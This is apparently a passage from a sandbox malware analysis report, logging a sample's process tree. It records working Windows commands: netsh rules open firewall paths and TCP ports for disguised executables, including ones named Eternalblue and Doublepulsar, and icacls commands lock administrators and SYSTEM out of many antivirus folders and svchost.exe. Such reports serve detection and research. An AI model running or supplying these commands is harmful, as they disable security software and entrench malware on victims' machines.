  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:8064
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8020
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:5984
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:7276
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8004
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8164
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:8060
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:8152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:6132
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:7224
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:4248
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:5164
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7296
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7624
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7736
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:4252
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:8008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:5292
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:7276
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:7472
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3160
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:5244
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:7260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7528
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7620
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7764
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7772
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:7248
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5568
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:7428
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3828
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:6040
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7508
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:392
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:3676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6704
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5904
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7480
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:3600
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7292
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:7676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:7188
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:5900
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:6664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8088
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:7780
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6784
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:7736
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7932
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7252
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3744
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:8108
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8080
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7440
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8060
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2640
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7596
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5940
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7768
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7828
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7312
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8184
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5348
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:748
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2308
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5244
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7788
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5976
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:7512
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3980
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:8088
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8036
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:7516
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5328
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7468
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6664
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7584
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5984
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7448
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7256
- C:\Windows\SysWOW64\cmd.exe
